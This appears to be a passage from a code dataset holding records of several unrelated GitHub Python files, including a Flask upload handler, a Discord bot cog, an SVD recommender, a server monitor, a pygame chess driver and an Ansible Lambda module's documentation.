commodity_source):\n ret = dict()\n ret[\"err_no\"] = 0\n ret[\"err_msg\"] = \"success\"\n try:\n f = request.files['img_file']\n tmp = f.filename.split(\".\")\n tmp[0] = source_id\n f.filename = \".\".join(tmp)\n print(f.filename)\n if not f:\n raise FileNotFoundError\n try:\n fname = secure_filename(f.filename)\n f.save(os.path.join(config.IMAGE_FOLDER, commodity_source, fname))\n except FileExistsError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"save this image error\"\n return jsonify(ret)\n except FileNotFoundError:\n ret[\"err_no\"] = 1\n ret[\"err_msg\"] = \"not have this file or open file error\"\n return jsonify(ret)\n\n return jsonify(ret)\n\n\n","repo_name":"interfaceFeng/price_forecast","sub_path":"price_interface/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"36601831270","text":"import logging\n\nfrom psa_car_controller.psa.connected_car_api import Battery\nfrom psa_car_controller.psa.connected_car_api.models.energy import Energy\nfrom psa_car_controller.psa.connected_car_api.models.energy_charging import EnergyCharging\nfrom psa_car_controller.psa.connected_car_api.models.geometry import Geometry\nfrom psa_car_controller.psa.connected_car_api.models.kinetic import Kinetic\nfrom psa_car_controller.psa.connected_car_api.models.position import Position\nfrom psa_car_controller.psa.connected_car_api.models.position_properties import PositionProperties\nfrom psa_car_controller.psa.connected_car_api.models.status import Status\nfrom psa_car_controller.psa.connected_car_api.models.vehicle_odometer import VehicleOdometer\n\nlogger = logging.getLogger(__name__)\n\n\n# pylint: disable=too-many-arguments\nclass CarStatus(Status):\n def __init__(self, embedded=None, links=None, battery=None, doors_state=None, energy=None, environment=None,\n ignition=None, kinetic=None, last_position=None, preconditionning=None, privacy=None, safety=None,\n service=None, timed_odometer=None): # noqa: E501\n super().__init__(embedded, links, battery, doors_state, energy, environment, ignition, kinetic, last_position,\n preconditionning, privacy, safety, service, timed_odometer)\n self.correct(False)\n\n def correct(self, electric_car):\n try:\n if len(self.last_position.geometry.coordinates) < 2:\n raise AttributeError()\n if len(self.last_position.geometry.coordinates) < 3:\n # set altitude none\n self.last_position.geometry.coordinates.append(None)\n except (AttributeError, TypeError):\n self.last_position = Position(geometry=Geometry(coordinates=[None, None, None], type=\"Point\"),\n properties=PositionProperties(updated_at=None))\n if self.kinetic is None:\n self.kinetic = Kinetic()\n # always put electric energy first\n if len(self._energy) == 2 and self._energy[0].type != 'Electric':\n self._energy = self._energy[::-1]\n\n if self.timed_odometer is None:\n self.timed_odometer = VehicleOdometer()\n if electric_car:\n self.get_energy(\"Fuel\").level = None\n if self.battery is None:\n self.battery = Battery()\n\n def is_moving(self):\n try:\n return self.kinetic.moving\n except AttributeError:\n logger.error(\"kinetic not available from api\")\n return None\n\n def get_energy(self, energy_type) -> Energy:\n for energy in self._energy:\n if energy.type == energy_type:\n return energy\n return Energy(charging=EnergyCharging())\n","repo_name":"flobz/psa_car_controller","sub_path":"psa_car_controller/psacc/model/car_status.py","file_name":"car_status.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"70"}
+{"seq_id":"35159488173","text":"import logging\n\nimport disnake\nfrom disnake.ext import commands\n\nfrom cogs.utils import database as db\nORM = db.ORM()\n\nlogger = logging.getLogger('bot.Guilds')\n\n\nclass Guilds(commands.Cog):\n \"\"\" Manage when the bot is added/removed from a guild.\n \"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n logger.info('Loaded.')\n\n msg = \"Use the command below **in your Server** to follow your first game 🎮\\n\"\n msg += \"```\\n\"\n msg += \"/dt-set-channel game\\n\"\n msg += \"```\\n\"\n msg += \"You can find some explanations for all available commands on .\"\n\n self.server_btn = disnake.ui.Button(\n label=\"Official Discord Server\",\n url=\"https://discord.gg/QN9uveFYXX\",\n style=disnake.ButtonStyle.link,\n ),\n\n self.help_message = msg\n\n # ---------------------------------------------------------------------------------\n # EVENT LISTENERS\n # ---------------------------------------------------------------------------------\n\n @commands.Cog.listener()\n async def on_message(self, message: disnake.Message):\n if isinstance(message.channel, disnake.DMChannel) and message.author != self.bot.user:\n\n await message.reply(self.help_message, components=[self.server_btn])\n\n\n @commands.Cog.listener()\n async def on_guild_join(self, guild : disnake.Guild):\n\n dt_channel = self.bot.get_channel(985250371981172757)\n if dt_channel:\n await dt_channel.send(f'`{guild.name} [{guild.id}]` joined. (Approx `{guild.member_count}` members)')\n\n await ORM.add_guild(guild.id)\n logger.info(f'{guild.name} [{guild.id}] added to DB.')\n\n\n # We can see the owner only if we have the Members privileged intent\n if not guild.owner_id:\n return\n\n msg = \"I'm now ready to track GameDevs for you !\\n\"\n msg += self.help_message\n\n try:\n owner = await self.bot.fetch_user(guild.owner_id)\n if not owner.dm_channel:\n await owner.create_dm()\n await owner.dm_channel.send(msg, components=[self.server_btn])\n except disnake.Forbidden:\n logger.warning(f'{guild.name}[{guild.id}] owner has blocked his DMs.')\n\n\n @commands.Cog.listener()\n async def on_guild_remove(self, guild : disnake.Guild):\n\n dt_channel = self.bot.get_channel(985250371981172757)\n if dt_channel:\n await dt_channel.send(f'`{guild.name} [{guild.id}]` removed. 
(Approx `{guild.member_count}` members)')\n\n await ORM.rm_guild(guild.id)\n logger.info(f'{guild.name} [{guild.id}] removed from DB.')\n\n # ---------------------------------------------------------------------------------\n # SLASH COMMANDS\n # ---------------------------------------------------------------------------------\n\n @commands.slash_command(name=\"dt-invite\", description=\"Invite DevTracker to your server.\")\n async def invite(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show invite link.')\n\n invite_btn = disnake.ui.Button(\n label=\"Invite Me !\",\n url=\"https://discord.com/api/oauth2/authorize?client_id=982257201211138050&permissions=274877958144&scope=applications.commands%20bot\",\n style=disnake.ButtonStyle.link,\n ),\n\n await inter.response.send_message(components=[invite_btn])\n\n @commands.slash_command(name=\"dt-help\", description=\"Struggling getting started?\")\n @commands.default_member_permissions(manage_guild=True)\n async def get_help_message(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show help.')\n\n await inter.response.send_message(self.help_message, components=[self.server_btn])\n\n @commands.slash_command(name=\"dt-discord-support\", description=\"Join the official DevTracker Discord Server.\")\n @commands.default_member_permissions(manage_guild=True)\n async def get_help_message(self, inter : disnake.ApplicationCommandInteraction):\n logger.info(f'{inter.guild.name} [{inter.guild_id}] : Show Server Invite.')\n\n await inter.response.send_message(components=[self.server_btn])\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Guilds(bot))\n","repo_name":"s0me-1/devtracker-bot","sub_path":"cogs/guilds.py","file_name":"guilds.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"12287340760","text":"# -*- coding: utf-8 -*-\nfrom numpy import *\nfrom numpy import linalg as la\n\n\ndef loadExData():\n return [[0, 0, 0, 2, 2],\n [0, 0, 0, 3, 3],\n [0, 0, 0, 1, 1],\n [1, 1, 1, 0, 0],\n [2, 2, 2, 0, 0],\n [5, 5, 5, 0, 0],\n [1, 1, 1, 0, 0]]\n\n\ndef loadExData2():\n return [[0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 5],\n [0, 0, 0, 3, 0, 4, 0, 0, 0, 0, 3],\n [0, 0, 0, 0, 4, 0, 0, 1, 0, 4, 0],\n [3, 3, 4, 0, 0, 0, 0, 2, 2, 0, 0],\n [5, 4, 5, 0, 0, 0, 0, 5, 5, 0, 0],\n [0, 0, 0, 0, 5, 0, 1, 0, 0, 5, 0],\n [4, 3, 4, 0, 0, 0, 0, 5, 5, 0, 1],\n [0, 0, 0, 4, 0, 4, 0, 0, 0, 0, 4],\n [0, 0, 0, 2, 0, 2, 5, 0, 0, 1, 2],\n [0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0],\n [1, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0]]\n#相似度1:欧式距离\ndef ecludSim(inA,inB):\n return 1.0/(1.0 + la.norm(inA - inB))\n#相似度2:威尔逊距离\ndef pearsSim(inA,inB):\n if len(inA) < 3 : return 1.0\n return 0.5+0.5*corrcoef(inA, inB, rowvar = 0)[0][1]\n#相似度3:余弦\ndef cosSim(inA,inB):\n num = float(inA.T*inB)\n denom = la.norm(inA)*la.norm(inB)\n return 0.5 + 0.5 * (num / denom)\n\n\n#遍历 计算相似度\ndef standEst(dataMat, user, simMeas, item):#数据矩阵、用户编号、相似度计算方法和物品编号\n n = shape(dataMat)[1]\n simTotal = 0.0;ratSimTotal = 0.0\n for j in range(n):\n userRating = dataMat[user, j]\n if userRating == 0: continue\n #寻找两个用户都做了评价的产品\n overLap = nonzero(logical_and(dataMat[:, item].A > 0, dataMat[:, j].A > 0))[0]\n if len(overLap) == 0:\n similarity = 0\n else:#存在两个用户都评价的产品 计算相似度\n similarity = simMeas(dataMat[overLap, item], dataMat[overLap, j])\n print ('the %d and %d similarity is: %f' % (item, j, similarity))\n simTotal += similarity #计算每个用户对所有评价产品累计相似度\n ratSimTotal += similarity * userRating #根据评分计算比率\n if simTotal == 0:\n return 0\n else:\n return ratSimTotal / simTotal\n\n#利用SVD\ndef svdEst(dataMat, user, simMeas, item):\n n = shape(dataMat)[1]\n simTotal = 0.0;ratSimTotal = 0.0\n U, Sigma, VT = la.svd(dataMat) #不同于stanEst函数,加入了SVD分解\n Sig4 = mat(eye(4) * Sigma[:4]) # 建立对角矩阵\n xformedItems = dataMat.T * U[:, :4] * Sig4.I #降维:变换到低维空间\n #下面依然是计算相似度,给出归一化评分\n for j in range(n):\n userRating = dataMat[user, j]\n if userRating == 0 or j == item: continue\n similarity = simMeas(xformedItems[item, :].T, xformedItems[j, :].T)\n print ('the %d and %d similarity is: %f' % (item, j, similarity))\n simTotal += similarity\n ratSimTotal += similarity * userRating\n if simTotal == 0:\n return 0\n else:\n return ratSimTotal / simTotal\n\n\ndef recommend(dataMat, user, N=3, simMeas=cosSim, estMethod=standEst):\n unratedItems = nonzero(dataMat[user, :].A == 0)[1] #寻找用户未评价的产品\n if len(unratedItems) == 0: return ('you rated everything')\n itemScores = []\n for item in unratedItems:\n estimatedScore = estMethod(dataMat, user, simMeas, item)#基于相似度的评分\n itemScores.append((item, estimatedScore))\n return sorted(itemScores, key=lambda jj: jj[1], reverse=True)[:N]\n\n\n#实例:SVD实现图像压缩\n\n#打印矩阵。由于矩阵包含了浮点数,因此必须定义浅色和深色。\ndef printMat(inMat, thresh=0.8):\n for i in range(32):\n for k in range(32):\n if float(inMat[i,k]) > thresh:\n print (1,)\n else: print (0,)\n print ('')\n\n#压缩\ndef imgCompress(numSV=3, thresh=0.8):\n myl = []\n for line in open('0_5.txt').readlines():\n newRow = []\n for i in range(32):\n newRow.append(int(line[i]))\n myl.append(newRow)\n myMat = mat(myl)\n print (\"****original matrix******\")\n #printMat(myMat, thresh)\n U,Sigma,VT = la.svd(myMat) #SVD分解\n SigRecon = mat(zeros((numSV, numSV))) #创建初始特征\n for k in range(numSV):#构造对角矩阵\n SigRecon[k,k] = Sigma[k]\n reconMat = U[:,:numSV]*SigRecon*VT[:numSV,:]\n print (\"****reconstructed matrix using %d singular 
values******\" % numSV)\n #printMat(reconMat, thresh)","repo_name":"stonycat/ML-in-Action-Code-and-Note","sub_path":"ch14/svdRec.py","file_name":"svdRec.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"70"}
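+A quick smoke test for the functions above, assuming the module's own from numpy import * namespace; it compares the plain item-based estimator with the SVD-backed one on the example matrix:
+
+myMat = mat(loadExData2())
+print(recommend(myMat, 1))                    # item-based estimates (standEst)
+print(recommend(myMat, 1, estMethod=svdEst))  # same user, scored in the SVD space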
+{"seq_id":"31787352588","text":"import numpy as np\nfrom .preprocessing import Preprocessing\nimport train\n\n\n# convert history into inputs and outputs\ndef to_supervised(train, n_input, n_out):\n # flatten data\n data = train.reshape((train.shape[0] * train.shape[1], train.shape[2]))\n X, y = list(), list()\n in_start = 0\n # step over the entire history one time step at a time\n for _ in range(len(data)):\n # define the end of the input sequence\n in_end = in_start + n_input\n out_end = in_end + n_out\n # ensure we have enough data for this instance\n if out_end < len(data):\n x_input = data[in_start:in_end, :]\n # x_input = x_input.reshape((len(x_input), x_input.shape[1]))\n X.append(x_input)\n y.append(data[in_end:out_end, 0])\n # move along one time step\n in_start += n_out\n\n return np.array(X), np.array(y)\n\n\ndef load_lstm_data(folder, filename, batch_size, n_output, split_set=True):\n df = Preprocessing.load_df(folder, filename)\n df['last_updated'] = df['last_updated'].astype(np.datetime64)\n if split_set:\n train_set, val_set, test_set , train_set_last, val_set_last, test_set_last = \\\n train.train_val_test_split(df, batch_size, 0.1, 0.1)\n x_train, y_train = to_supervised(train_set, batch_size, n_output)\n #x_train_last, y_train_last = to_supervised(train_set_last, len(train_set_last), n_output)\n x_val, y_val = to_supervised(train_set, batch_size, n_output)\n #x_val_last, y_val_last = to_supervised(val_set_last, len(val_set_last), n_output)\n x_test, y_test = to_supervised(train_set, batch_size, n_output)\n #x_test_last, y_test_last = to_supervised(test_set_last, len(test_set_last), n_output)\n return x_train, x_val, x_test, y_train, y_val, y_test\n\n else:\n data_set, data_set_last = train.prepare_single_set(df, batch_size)\n x, y = to_supervised(data_set, batch_size, n_output)\n #x_last, y_last = to_supervised(data_set_last, len(data_set_last), n_output)\n\n return x, y\n","repo_name":"CMootz/week_program","sub_path":"src/Preprocessing/prepare_lstm.py","file_name":"prepare_lstm.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71275941987","text":"from datetime import datetime\nfrom adapters import NetworkAdapter\nimport time\nimport re\n\n\nclass ServerMonitor:\n def __init__(self, config_file: list, network_adapter: NetworkAdapter):\n self.config = config_file\n self.network_adapter = network_adapter\n\n @staticmethod\n def is_host_ip(host: str) -> bool:\n # Проверка, является ли переданный хост IP-адресом\n ip_pattern = r'^(\\d{1,3}\\.){3}\\d{1,3}$'\n if re.match(ip_pattern, host):\n octets = host.split('.')\n if all(int(octet) < 256 for octet in octets):\n return True\n return False\n\n @staticmethod\n def is_valid_host(host: str) -> bool:\n # Проверка, является ли переданный хост допустимым IP-адресом или доменным именем\n hostname_pattern = r'^[a-zA-Z0-9]+([\\-.]{1}[a-zA-Z0-9]+)*\\.[a-zA-Z]{2,20}$'\n special_domains = ['localhost', 'broadcasthost']\n\n if host in special_domains:\n return True\n\n if ServerMonitor.is_host_ip(host):\n return True\n\n if re.match(hostname_pattern, host):\n return True\n\n return False\n\n @staticmethod\n def validate_input_data(input_data: list) -> bool:\n # Валидация данных входного файла\n validation_result = True\n for row_number, entry in enumerate(input_data, 2):\n host, port_list = entry\n if ServerMonitor.is_valid_host(host):\n if not host and port_list:\n print(f\"Некорректные входные данные: отсутствует доменное имя. Строка {row_number}\")\n if not host and not port_list:\n print(f\"Некорректные входные данные: и доменное имя, и порт отсутствуют. Строка {row_number}\")\n validation_result = False\n if port_list:\n for port in port_list:\n if not port.isdigit() or int(port) < 0 or int(port) > 65535:\n print(f\"Некорректные входные данные: недопустимый порт '{port}'. Строка {row_number}\")\n validation_result = False\n else:\n print(f\"Некорректные входные данные: неверный IP-адрес '{host}'. Строка {row_number}\")\n validation_result = False\n return validation_result\n\n def is_internet_available(self) -> bool:\n # Проверка доступности интернет-соединения\n internet_rtt_check = self.network_adapter.get_rtt('8.8.8.8')\n if internet_rtt_check is not None and internet_rtt_check < 2000:\n return True\n else:\n return False\n\n def monitor_server(self, host: str, ports: list) -> None:\n # Функция мониторинга сервера\n if not self.is_internet_available():\n print(\"Отсутсвует интернет-соединение. Ждем восстановление доступа.\")\n while not self.is_internet_available():\n time.sleep(10) # Check every 10 seconds\n print(\"Интернет-соединение восстановлено.\\n\")\n\n ips = list(set(self.network_adapter.resolve_domain(host))) if host else ['']\n if not host or self.is_host_ip(host):\n host = '???'\n print(f\"['{host}', {ips}, {ports}]\")\n for ip in ips:\n lost_packets = self.network_adapter.ping(ip)\n rtt = self.network_adapter.get_rtt(ip) if lost_packets != 100 else None\n open_ports = self.network_adapter.check_ports(ip, ports) if ports else []\n timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')\n if not ports:\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | -1 | ???\")\n else:\n for port in ports:\n status = 'Opened' if port in open_ports else 'Unknown'\n if port == '443':\n cert_status = self.network_adapter.check_certificate(host if host != '???' 
else ip)\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | {port} | {status} \"\n f\"| {cert_status}\")\n else:\n print(f\"{timestamp} | {host} | {ip} | {lost_packets} | {rtt} ms | {port} | {status}\")\n print()\n\n def monitor(self) -> None:\n # Функция мониторинга всех серверов из файла конфигурации\n for host, ports in self.config:\n self.monitor_server(host, ports)\n","repo_name":"GoshkaLP/tbo_python2023","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74586932066","text":"# Driver file\n# Handling user input & displaying current GameState\n\nimport pygame as p\nfrom Engine import GameState, Move\n\np.init()\nWIDTH = HEIGHT = 512 # 400 other option\nDIMENSION = 8\nSQ_SIZE = HEIGHT // DIMENSION\nMAX_FPS = 15\nIMAGES = {}\n\n# Init global dictionary of images. Called once in main\n\n\ndef load_images():\n pieces = [\"wp\", \"wR\", \"wN\", \"wB\", \"wQ\",\n \"wK\", \"bp\", \"bR\", \"bN\", \"bB\", \"bQ\", \"bK\"]\n\n for piece in pieces:\n IMAGES[piece] = p.transform.scale(\n p.image.load(f\"img/{piece}.png\"), (SQ_SIZE, SQ_SIZE))\n\n\ndef draw_board(screen):\n colors = [p.Color(\"white\"), p.Color(\"dark green\")]\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n color = colors[((r+c) % 2)]\n p.draw.rect(screen, color, p.Rect(\n c*SQ_SIZE, r*SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\ndef draw_pieces(screen, board):\n for r in range(DIMENSION):\n for c in range(DIMENSION):\n piece = board[r][c]\n if piece != \"--\":\n screen.blit(IMAGES[piece], p.Rect(\n c*SQ_SIZE, r*SQ_SIZE, SQ_SIZE, SQ_SIZE))\n\n\n# Responsible for all graphics within current gamestate\ndef draw_game_state(screen, gs):\n draw_board(screen)\n draw_pieces(screen, gs.board)\n\n\n# Main driver for our code. Handle user input & updating graphics\ndef main():\n p.init()\n screen = p.display.set_mode((WIDTH, HEIGHT))\n clock = p.time.Clock()\n # screen.fill(p.Color(\"White\"))\n gs = GameState()\n\n validMoves = gs.get_valid_moves()\n moveMade = False # flag variable for made move\n\n load_images()\n\n sqSelected = () # last click of the user\n playerClicks = [] # Keep track of clicks [(6,4), (4,4)]\n\n running = True\n while running:\n for e in p.event.get():\n if e.type == p.QUIT:\n running = False\n # mouse handler\n elif e.type == p.MOUSEBUTTONDOWN:\n location = p.mouse.get_pos() # (x,y) location of mouse\n col = location[0]//SQ_SIZE\n row = location[1]//SQ_SIZE\n if sqSelected == (row, col):\n sqSelected = ()\n playerClicks = []\n else:\n sqSelected = (row, col)\n playerClicks.append(sqSelected)\n if len(playerClicks) == 2:\n move = Move(playerClicks[0], playerClicks[1], gs.board)\n for i in range(len(validMoves)):\n if move == validMoves[i]:\n gs.make_move(validMoves[i])\n print(move.get_chess_notation())\n moveMade = True\n sqSelected = () # reset user clicks\n playerClicks = []\n if not moveMade:\n playerClicks = [sqSelected]\n\n # key handler\n elif e.type == p.KEYDOWN:\n if e.key == p.K_u:\n gs.undo_move()\n moveMade = True\n if moveMade:\n validMoves = gs.get_valid_moves()\n moveMade = False\n draw_game_state(screen, gs)\n clock.tick(MAX_FPS)\n p.display.flip()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"berkan-alci/Python_Chess_Engine","sub_path":"logic/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"37477254039","text":"'''\n4. Median of Two Sorted Arrays\nHard\n\nGiven two sorted arrays nums1 and nums2 of size m and n respectively, return the\nmedian of the two sorted arrays.\n\nFollow up: The overall run time complexity should be O(log (m+n)).\n\n\n\nExample 1:\n\nInput: nums1 = [1,3], nums2 = [2]\nOutput: 2.00000\nExplanation: merged array = [1,2,3] and median is 2.\nExample 2:\n\nInput: nums1 = [1,2], nums2 = [3,4]\nOutput: 2.50000\nExplanation: merged array = [1,2,3,4] and median is (2 + 3) / 2 = 2.5.\nExample 3:\n\nInput: nums1 = [0,0], nums2 = [0,0]\nOutput: 0.00000\nExample 4:\n\nInput: nums1 = [], nums2 = [1]\nOutput: 1.00000\nExample 5:\n\nInput: nums1 = [2], nums2 = []\nOutput: 2.00000\n\n\nConstraints:\n\nnums1.length == m\nnums2.length == n\n0 <= m <= 1000\n0 <= n <= 1000\n1 <= m + n <= 2000\n-106 <= nums1[i], nums2[i] <= 106\n\n'''\n\n\nclass Solution:\n\n # Time O(log(min(M,N))), Space O(1), runtime = 88 ms\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n\n if not nums1 and not nums2: return -1\n\n # assume nums1 is the smallest array\n size1 = len(nums1)\n size2 = len(nums2)\n if size1 > size2:\n size1, size2 = size2, size1\n nums1, nums2 = nums2, nums1\n\n # binary search to find the partition\n lo, hi = 0, size1\n while lo <= hi:\n mid1 = (lo + hi) // 2\n mid2 = (size1 + size2 + 1) // 2 - mid1\n\n l1_index = mid1 - 1\n r1_index = mid1\n l2_index = mid2 - 1\n r2_index = mid2\n\n l1 = nums1[l1_index] if mid1 != 0 else float('-inf')\n r1 = nums1[r1_index] if mid1 != size1 else float('inf')\n l2 = nums2[l2_index] if mid2 != 0 else float('-inf')\n r2 = nums2[r2_index] if mid2 != size2 else float('inf')\n\n if l2 <= r1 and l1 <= r2:\n # calculate the median value\n if (size1 + size2) % 2:\n return max(l1, l2)\n else:\n a = max(l1, l2)\n b = min(r1, r2)\n return (a + b) / 2\n\n elif l1 > r2:\n hi = mid1 - 1\n\n else:\n lo = mid1 + 1\n","repo_name":"jjingdong/LeetCode","sub_path":"4MedianOfTwoSortedArrays.py","file_name":"4MedianOfTwoSortedArrays.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"9364631702","text":"import persistent\nfrom zope.interface import implements\nfrom BTrees.OOBTree import OOBTree\nfrom BTrees.Length import Length\n\nfrom collective.subscribe.interfaces import IItemSubscriber, ISubscribers\nfrom collective.subscribe.utils import bind_field_properties\n\n\nclass ItemSubscriber(persistent.Persistent):\n \"\"\"Item subscriber implementation\"\"\"\n\n implements(IItemSubscriber)\n\n bind_field_properties(locals(), IItemSubscriber) # props from field schema\n\n def __init__(self, **kwargs):\n \"\"\"\n Construct, if keyword arguments are used to construct, validate\n invariant on passed field values.\n \"\"\"\n if kwargs:\n user = kwargs.get('user', None)\n name = kwargs.get('name', None)\n namespace = kwargs.get('namespace', 'member')\n email = kwargs.get('email', None)\n if isinstance(user, unicode):\n user = user.encode('utf-8')\n self.user = user\n if isinstance(email, unicode):\n email = email.encode('utf-8')\n self.email = email\n if isinstance(name, str):\n name = name.decode('utf-8')\n self.name = name\n if isinstance(namespace, unicode):\n namespace = namespace.encode('utf-8')\n self.namespace = namespace\n IItemSubscriber.validateInvariants(self)\n\n def signature(self):\n \"\"\"\n return two-string tuple signature of (namespace, user or email); can\n be used as a composed key for storage implementations. Raises a\n zope.interface.Invalid exception if signature is not possible due to\n insufficient field data.\n \"\"\"\n IItemSubscriber.validateInvariants(self) # may raise Invalid...\n namespace = self.namespace\n identifier = self.user\n if self.email and not self.user:\n namespace = 'email' # ignore field default\n identifier = self.email\n return (namespace, identifier)\n\n\nclass SubscribersContainer(OOBTree):\n \"\"\"Container/mapping for subscribers\"\"\"\n implements(ISubscribers)\n\n def __init__(self, *args, **kwargs):\n super(SubscribersContainer, self).__init__(*args, **kwargs)\n self.size = Length()\n\n # wrap superclass __getstate__ and __setstate__ to save attrs such\n\n def __getstate__(self):\n tree_state = super(SubscribersContainer, self).__getstate__()\n attr_state = [(k, v) for k, v in self.__dict__.items()\n if not (k.startswith('_v_') or k.startswith('__'))]\n return (tree_state, attr_state)\n\n def __setstate__(self, v):\n tree_state = v[0]\n attr_state = v[1]\n for k, v in attr_state:\n setattr(self, k, v)\n super(SubscribersContainer, self).__setstate__(tree_state)\n\n def _normalize_key(self, key):\n \"\"\"\n given key or object providing IItemSubscriber, normalize unique key\n \"\"\"\n if IItemSubscriber.providedBy(key):\n key = key.signature()\n elif isinstance(key, basestring):\n key = ('email', str(basestring))\n if not (len(key) == 2 and key[0] and key[1]):\n raise KeyError('incomplete key for subscriber')\n return key\n\n def _set_new(self, key, value):\n \"\"\"set new item, but do not allow replacing existing item\"\"\"\n if key in self:\n raise ValueError('attempt to add: duplicate key; record exists')\n self.__setitem__(key, value)\n\n def add(self, *args, **kwargs):\n k = None\n fields = kwargs\n if not kwargs and len(args) == 1:\n v = args[0]\n if IItemSubscriber.providedBy(v):\n k = self._normalize_key(v)\n if isinstance(v, persistent.Persistent):\n self._set_new(k, v)\n return k, v\n fields = v.__dict__ # we'll copy values, not object to store\n # otherwise, assume a dict from args[0]:\n else:\n try:\n fields = dict(v)\n except ValueError:\n import sys\n exc_info = sys.exc_info()\n raise (KeyError, 
exc_info[1], exc_info[2]) # noqa\n v = ItemSubscriber(**fields)\n if k is None:\n k = self._normalize_key(v)\n self._set_new(k, v)\n return k, v\n\n # Callers should not use __setitem__ -- it is here as a check\n # on keeping a BTree size/length extrinsic to the BTree itself.\n def __setitem__(self, key, value):\n if not IItemSubscriber.providedBy(value):\n raise ValueError('__setitem__ value must provide IItemSubscriber')\n if key not in self:\n self.size.change(1) # increment\n super(SubscribersContainer, self).__setitem__(key, value)\n\n def get(self, subscriber, default=None):\n key = self._normalize_key(subscriber)\n return super(SubscribersContainer, self).get(key, default)\n\n def __getitem__(self, key):\n key = self._normalize_key(key)\n return super(SubscribersContainer, self).__getitem__(key)\n\n def __len__(self):\n return self.size()\n\n def __contains__(self, key):\n normalized = self._normalize_key(key)\n if IItemSubscriber.providedBy(key):\n if key is not super(SubscribersContainer, self).get(normalized,\n None):\n return False\n key = self._normalize_key(normalized)\n return super(SubscribersContainer, self).__contains__(normalized)\n\n def __delitem__(self, key):\n key = self._normalize_key(key)\n super(SubscribersContainer, self).__delitem__(key)\n self.size.change(-1) # decrement if superclass __delitem__ succeeds\n\n","repo_name":"collective/collective.subscribe","sub_path":"collective/subscribe/subscriber.py","file_name":"subscriber.py","file_ext":"py","file_size_in_byte":5815,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"21308046024","text":"#!/usr/bin/python\n# from collections import defaultdict\nimport os\nimport datetime\nfrom datetime import datetime as dtime\n# import time\n\nDOCUMENTATION = '''\n---\nmodule: cr_lambda_triggers\nshort_description: Creates, updates or deletes AWS Lambda function event mappings.\ndescription:\n - This module allows the management of AWS Lambda function event source mappings such as S3 bucket\n events, DynamoDB and Kinesis streaming events via the Ansible framework.\n It is idempotent and supports \"Check\" mode. Use module M(lambda) to manage the lambda\n function itself and M(lambda_alias) to manage function aliases.\nversion_added: \"2.1\"\nauthor: Robert Colvin (@rcolvin)\noptions:\n aws_access_key:\n description:\n - AWS access key id. If not set then the value of the AWS_ACCESS_KEY environment variable is used.\n required: false\n default: null\n aliases: [ 'ec2_access_key', 'access_key' ]\n aws_secret_key:\n description:\n - AWS secret key. If not set then the value of the AWS_SECRET_KEY environment variable is used.\n required: false\n default: null\n aliases: ['ec2_secret_key', 'secret_key']\n lambda_function_arn:\n description:\n - The name or ARN of the lambda function.\n required: true\n aliases: ['function_name', 'function_arn']\n state:\n description:\n - Describes the desired state and defaults to \"present\".\n required: true\n default: \"present\"\n choices: [\"present\", \"absent\"]\n alias:\n description:\n - Name of the function alias. Mutually exclusive with C(version).\n required: true\n version:\n description:\n - Version of the Lambda function. Mutually exclusive with C(alias).\n required: false\n event_source:\n description:\n - Source of the event that triggers the lambda function.\n required: true\n choices: ['s3', 'Kinesis', 'DynamoDB', 'SNS']\n source_params:\n description:\n - Sub-parameters required for event source.\n - I(== S3 event source ==)\n - C(id) Unique ID for this source event.\n - C(bucket) Name of source bucket.\n - C(prefix) Bucket prefix (e.g. images/)\n - C(suffix) Bucket suffix (e.g. log)\n - C(events) List of events (e.g. ['s3:ObjectCreated:Put'])\n - I(== stream event source ==)\n - C(source_arn) The Amazon Resource Name (ARN) of the Kinesis or DynamoDB stream that is the event source.\n - C(enabled) Indicates whether AWS Lambda should begin polling the event source. Default is True.\n - C(batch_size) The largest number of records that AWS Lambda will retrieve from your event source at the\n time of invoking your function. Default is 100.\n - C(starting_position) The position in the stream where AWS Lambda should start reading.\n Choices are TRIM_HORIZON or LATEST.\n - I(== SNS event source ==)\n - C(id) Unique ID for this source event.\n - C(topic_arn) The ARN of the topic to which you want to subscribe the lambda function.\n required: true\n requirements:\n - boto3\n extends_documentation_fragment:\n - aws\n\n'''\n\nEXAMPLES = '''\n- name: update/EXISTS [API RESOURCE] \n cr_apigw_set:\n apigw_type: \"resource\"\n name: \"{{ item.name }}\" ##name of the API\n path: \"{{ item.path }}\" ##FULL 